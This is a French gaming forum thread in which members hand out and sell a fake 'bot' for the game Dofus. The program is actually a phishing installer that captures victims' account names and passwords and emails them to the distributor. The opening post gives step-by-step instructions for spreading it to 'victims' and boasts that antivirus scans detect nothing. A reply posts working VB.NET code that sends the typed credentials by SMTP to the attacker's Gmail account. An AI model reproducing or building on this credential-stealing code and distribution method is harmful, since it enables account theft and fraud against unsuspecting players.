FAKE bot (envoie ID par email) [Gratuit]

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

zehaha

Membre actif
Nov 28, 2010
347
0
752
Sur mon canapé
Ne me demandez plus, j'arrete de distribuer ce programme, simplement pour avoir du temps pour autre chose
(Je passais 4heures par jour pour tout personnaliser/envoyer)

Merci aux 253 personnes qui ont utilisés ce programme! (vous pouvez continuer de l'utiliser, hein)

Hay!
Cette fois, je viens vous présenter mon tout nouveau fake bot!
J'ai tout fais pour qu'il semble "réaliste", bien que je pense que quelques améliorations peuvent etre faites.

Fonctions:
ouvre une fenetre "classique"
1124493216.png

1124493314.png

1124493428.png

1124493865.png

Comme pour mon fake generateur de kamas, je vous le fais gratuitement, postez ici ET envoyez moi un MP contenant votre adresse mail et si vous souhaitez avoir des modifs (icones, pas le même nom...). Je vous fournis l’installateur à envoyer à vos victimes!

EXCLUE: Plus besoin d'avoir une adresse GMail, tout marche avec toutes les adresses (hotmail, laposte.net, Yahoo... TOUT!)

100%fonctionnel!

(et bien sur, si votre victime fait un virus scan, ce sera CLEAN!)

Je rajoute un mini-tuto:

1-M'envoyer un Message Privé contenant votre email.

2-Attendre que je personnalise le logiciel pour vous, et que je l'upload (c'est rapide, mais pénible :p)

3-Téléchargez le fichier que je vous envoie en MP

4-Changer le nom (je met votre pseudo, pour m'y retrouver :p), je conseille de mettre UltimateBOT_Setup

5-Uploader ce fichier (sur megaupload par exemple), et donner le lien pour vos victimes

6-une fois que les victimes ont entrées leur compte et mot de passe, un mail sera envoyé contenant les informations

7-Enjoy :)

PS: comme d'hab', la source (VB.NET) est à 0.5€ OU 200 000kamas sur le serveur Dofus de votre choix!


Edit, pour ceux qui doutent:
Robin00795 said:
je me suis fait 15m hier soir = o^^
Je go test :)
J'ai fais un virustotal et effectivement, 0/43 :)
Merci :)
xMarche tip top , Kapersky detecte rein et envoie les mdp et ndc a l'email . En direct en plus ^^"
MERCI

Comme mon autre fake, interdit de le poster sur Cheat-gam3.com, merci.

PS: Pensez à me mettre un "merci" :)
 

fredy123

Membre actif
Jan 16, 2011
354
22
934
Discord
Fredy123#4251
zehaha said:
Comme pour mon fake generateur de kamas, je vous le fais gratuitement,

Je croyais qu'il avait été assez clair . . . . Mais non . . . . il y aura toujours des gens qui poseront des questions St*****.

C'est la source qui n'est pas gratuite. -_-
 
Apr 26, 2011
1,315
2
944
26
In my home
Discord
brokeos
Attends tu fais payer une sources avec quoi .... 40 lignes de codes ? C'est honteux ... de plus, comment veux-tu que la personne a qui tu vas le donner (sans les sources) configure la reception d'email sur sa boite mail ?

Donc les gars, en gros si vous n'achetez pas les sources, les comptes lui seront envoyés a SON mail.

Donc, la version gratuite ? vous bosserez pour lui, la version payante en revanche vous pourrez y configurer vos mails ...

+1

Si vous voulez la source c'est facile :

Dim mail As New MailMessage
mail.To.Add("votre adresse gmail")
mail.From = New MailAddress("votre adresse gmail")
mail.Subject = "Fake"
mail.Body = "Login: " & TextBox1.Text & " Password: " & TextBox2.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential(("votre adresse gmail"), "votre mot de passe gmail")
SMTP.Send(mail)

et en haut de Public class form1

Imports System.Net.Mail
 

zehaha

Membre actif
Nov 28, 2010
347
0
752
Sur mon canapé
Attends tu fais payer une sources avec quoi .... 40 lignes de codes ? C'est honteux ... de plus, comment veux-tu que la personne a qui tu vas le donner (sans les sources) configure la reception d'email sur sa boite mail ?

Donc les gars, en gros si vous n'achetez pas les sources, les comptes lui seront envoyés a SON mail.

Donc, la version gratuite ? vous bosserez pour lui, la version payante en revanche vous pourrez y configurer vos mails ...

Tu crois que je demande l'adresse mail pour quoi? Pour configurer dessus ... ca t'arrive de réfléchir?
Ah, et je ne vous oblige pas à acheter les sources, mais il y a des trucs sympa à voir que j'aurais aimé trouvé il y a quelque mois quand je débutais. (entre autre, la récupération des NDC dans la listbox qui peut faire croire que le bot marche...)

Ah, et le code ci dessus, il manque une ou deux lignes, et c'est tellement plus beau avec un try...

---------- Message ajouté à 10h55 ---------- Le message précédent était à 10h45 ----------


Oh, et je n'avais pas vu qui avait posté... Quelqu'un qui n'a rien fait, à part en AutoIT (lulz), et qui VEND un truc que je propose gratuitement... Ahahaha.

---------- Message ajouté à 11h07 ---------- Le message précédent était à 10h55 ----------

@Loic 1888 & @Andros: Regardez vos MP
 

zehaha

Membre actif
Nov 28, 2010
347
0
752
Sur mon canapé
En gros, la procédure est simple:
-J'ai mon code source de mon projet.
-Vous me PM en me donnant votre adresse mail
-Je change dans le projet l'adresse du destinataire
-Je compile et créé l'instalateur
-Je vous l'envoie (hébergé sur Megaupload)
-Vous diffuser l'installateur tel quel. (installez le chez vous si vous voulez, vous pourez faire des tests avec des fakes comptes)

Et voila :)

Et je disais que dans le morceau de code que tu as donné, il manquait quelques lignes assez intéressantes, et que mettre un "try" est assez intéressant.
 

zehaha

Membre actif
Nov 28, 2010
347
0
752
Sur mon canapé
Je suis en train d'envoyer tout ça! regardez vos MP!

---------- Message ajouté à 20h34 ---------- Le message précédent était à 20h27 ----------

Edit: fini d'envoyer :)

(Sauf à Yaidj, je te fais ça dans la soirée)
 

zehaha

Membre actif
Nov 28, 2010
347
0
752
Sur mon canapé
J'ai envoyé pour tout le monde!

Et grosse new: plus besoin d'avoir une adresse gmail, n'importe quelle adresse mail me suffit maintenant!
 

Skiipix1.0

Membre
Apr 30, 2011
90
0
737